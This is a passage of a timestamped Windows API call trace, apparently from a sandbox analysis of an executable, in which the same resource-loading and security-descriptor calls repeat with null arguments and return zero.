0x0 [0220.097] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.097] LockResource (hResData=0x0) returned 0x0 [0220.097] FreeResource (hResData=0x0) returned 0 [0220.097] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.097] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.097] LockResource (hResData=0x0) returned 0x0 [0220.097] FreeResource (hResData=0x0) returned 0 [0220.098] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.098] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.098] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.098] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.098] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.098] LockResource (hResData=0x0) returned 0x0 [0220.098] FreeResource (hResData=0x0) returned 0 [0220.098] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.098] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.098] LockResource (hResData=0x0) returned 0x0 [0220.098] FreeResource (hResData=0x0) returned 0 [0220.098] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.098] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.098] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.098] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.098] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.098] LockResource (hResData=0x0) returned 0x0 [0220.098] FreeResource (hResData=0x0) returned 0 [0220.098] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.098] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.098] LockResource (hResData=0x0) returned 0x0 [0220.098] FreeResource (hResData=0x0) returned 0 [0220.098] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.098] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.098] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.098] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.098] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.098] LockResource (hResData=0x0) returned 0x0 [0220.098] FreeResource (hResData=0x0) returned 0 [0220.098] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.098] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.098] LockResource (hResData=0x0) returned 0x0 [0220.098] FreeResource (hResData=0x0) returned 0 [0220.098] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.098] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.098] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.098] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.098] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.098] LockResource (hResData=0x0) returned 0x0 [0220.098] FreeResource (hResData=0x0) returned 0 [0220.098] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.098] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.098] LockResource (hResData=0x0) returned 0x0 [0220.098] FreeResource (hResData=0x0) returned 0 [0220.099] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.099] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.099] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.099] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.099] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.099] LockResource (hResData=0x0) returned 0x0 [0220.099] FreeResource (hResData=0x0) returned 0 [0220.099] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.099] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.099] LockResource (hResData=0x0) returned 0x0 [0220.099] FreeResource (hResData=0x0) returned 0 [0220.099] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.099] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.099] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.099] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.100] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.100] LockResource (hResData=0x0) returned 0x0 [0220.100] FreeResource (hResData=0x0) returned 0 [0220.100] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.100] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.100] LockResource (hResData=0x0) returned 0x0 [0220.100] FreeResource (hResData=0x0) returned 0 [0220.100] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.100] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.100] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.100] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.100] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.100] LockResource (hResData=0x0) returned 0x0 [0220.100] FreeResource (hResData=0x0) returned 0 [0220.100] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.100] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.100] LockResource (hResData=0x0) returned 0x0 [0220.100] FreeResource (hResData=0x0) returned 0 [0220.100] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.100] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.100] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.100] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.100] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.100] LockResource (hResData=0x0) returned 0x0 [0220.100] FreeResource (hResData=0x0) returned 0 [0220.100] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.100] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.100] LockResource (hResData=0x0) returned 0x0 [0220.100] FreeResource (hResData=0x0) returned 0 [0220.100] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.100] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.100] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.100] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.100] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.100] LockResource (hResData=0x0) returned 0x0 [0220.100] FreeResource (hResData=0x0) returned 0 [0220.100] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.100] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.100] LockResource (hResData=0x0) returned 0x0 [0220.100] FreeResource (hResData=0x0) returned 0 [0220.100] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.100] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.100] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.100] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.101] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.101] LockResource (hResData=0x0) returned 0x0 [0220.101] FreeResource (hResData=0x0) returned 0 [0220.101] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.101] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.101] LockResource (hResData=0x0) returned 0x0 [0220.101] FreeResource (hResData=0x0) returned 0 [0220.101] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.101] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.101] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.101] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.101] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.101] LockResource (hResData=0x0) returned 0x0 [0220.101] FreeResource (hResData=0x0) returned 0 [0220.101] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.101] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.101] LockResource (hResData=0x0) returned 0x0 [0220.101] FreeResource (hResData=0x0) returned 0 [0220.101] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.101] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.101] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.101] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.101] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.101] LockResource (hResData=0x0) returned 0x0 [0220.101] FreeResource (hResData=0x0) returned 0 [0220.101] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.101] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.101] LockResource (hResData=0x0) returned 0x0 [0220.101] FreeResource (hResData=0x0) returned 0 [0220.101] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.101] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.101] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.101] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.101] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.101] LockResource (hResData=0x0) returned 0x0 [0220.101] FreeResource (hResData=0x0) returned 0 [0220.101] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.101] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.101] LockResource (hResData=0x0) returned 0x0 [0220.101] FreeResource (hResData=0x0) returned 0 [0220.101] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.101] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.101] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.101] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.102] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.102] LockResource (hResData=0x0) returned 0x0 [0220.102] FreeResource (hResData=0x0) returned 0 [0220.102] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.102] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.102] LockResource (hResData=0x0) returned 0x0 [0220.102] FreeResource (hResData=0x0) returned 0 [0220.102] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.102] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.102] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.102] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.102] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.102] LockResource (hResData=0x0) returned 0x0 [0220.102] FreeResource (hResData=0x0) returned 0 [0220.102] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.102] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.102] LockResource (hResData=0x0) returned 0x0 [0220.102] FreeResource (hResData=0x0) returned 0 [0220.102] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.102] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.102] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.102] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.102] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.102] LockResource (hResData=0x0) returned 0x0 [0220.102] FreeResource (hResData=0x0) returned 0 [0220.102] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.102] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.102] LockResource (hResData=0x0) returned 0x0 [0220.102] FreeResource (hResData=0x0) returned 0 [0220.102] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.102] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.102] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.102] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.102] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.102] LockResource (hResData=0x0) returned 0x0 [0220.102] FreeResource (hResData=0x0) returned 0 [0220.102] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.102] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.102] LockResource (hResData=0x0) returned 0x0 [0220.102] FreeResource (hResData=0x0) returned 0 [0220.102] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.102] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.102] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.103] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.103] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.103] LockResource (hResData=0x0) returned 0x0 [0220.103] FreeResource (hResData=0x0) returned 0 [0220.103] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.103] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.103] LockResource (hResData=0x0) returned 0x0 [0220.103] FreeResource (hResData=0x0) returned 0 [0220.103] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.103] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.103] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.103] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.103] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.103] LockResource (hResData=0x0) returned 0x0 [0220.103] FreeResource (hResData=0x0) returned 0 [0220.103] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.103] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.103] LockResource (hResData=0x0) returned 0x0 [0220.103] FreeResource (hResData=0x0) returned 0 [0220.103] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.103] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.103] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.103] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.103] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.103] LockResource (hResData=0x0) returned 0x0 [0220.103] FreeResource (hResData=0x0) returned 0 [0220.103] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.103] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.103] LockResource (hResData=0x0) returned 0x0 [0220.103] FreeResource (hResData=0x0) returned 0 [0220.103] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.103] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.103] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.103] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.103] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.103] LockResource (hResData=0x0) returned 0x0 [0220.103] FreeResource (hResData=0x0) returned 0 [0220.103] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.103] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.103] LockResource (hResData=0x0) returned 0x0 [0220.103] FreeResource (hResData=0x0) returned 0 [0220.103] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.103] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.104] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.104] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.104] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.104] LockResource (hResData=0x0) returned 0x0 [0220.104] FreeResource (hResData=0x0) returned 0 [0220.104] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.104] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.104] LockResource (hResData=0x0) returned 0x0 [0220.104] FreeResource (hResData=0x0) returned 0 [0220.104] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.104] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.104] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.104] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.104] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.104] LockResource (hResData=0x0) returned 0x0 [0220.104] FreeResource (hResData=0x0) returned 0 [0220.104] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.104] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.104] LockResource (hResData=0x0) returned 0x0 [0220.104] FreeResource (hResData=0x0) returned 0 [0220.104] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.104] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.104] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.104] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.104] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.104] LockResource (hResData=0x0) returned 0x0 [0220.104] FreeResource (hResData=0x0) returned 0 [0220.104] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.104] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.104] LockResource (hResData=0x0) returned 0x0 [0220.104] FreeResource (hResData=0x0) returned 0 [0220.104] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.104] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.104] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.104] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.104] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.104] LockResource (hResData=0x0) returned 0x0 [0220.104] FreeResource (hResData=0x0) returned 0 [0220.104] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.104] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.104] LockResource (hResData=0x0) returned 0x0 [0220.104] FreeResource (hResData=0x0) returned 0 [0220.104] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.104] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.104] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.105] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.105] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.105] LockResource (hResData=0x0) returned 0x0 [0220.105] FreeResource (hResData=0x0) returned 0 [0220.105] FindResourceA (hModule=0x400000, lpName=0x0, 